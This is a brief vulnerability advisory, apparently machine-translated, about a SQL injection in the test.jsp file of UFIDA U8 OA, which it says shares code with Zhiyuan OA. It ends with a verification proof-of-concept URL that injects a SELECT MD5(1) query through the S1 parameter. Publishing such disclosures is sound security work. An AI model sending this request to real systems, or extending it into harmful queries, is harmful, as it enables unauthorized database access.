Ufida U8 Oa Test Jsp Sql Injection Vulnerability
Ufida U8 Oa Test Jsp Sql Injection Vulnerability
UFIDA U8 OA test.jsp SQL injection vulnerability
Vulnerability Description
The UFIDA U8 OA test.jsp file has a SQL injection vulnerability. Since it uses the same file as Zhiyuan OA, the same vulnerability exists.
Vulnerability Impact
UFIDA U8 OA
Network surveying and mapping
Vulnerability reappears
The login page is as follows
Verify POC
/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20MD5(1))
This post is licensed under CC BY 4.0 by the author.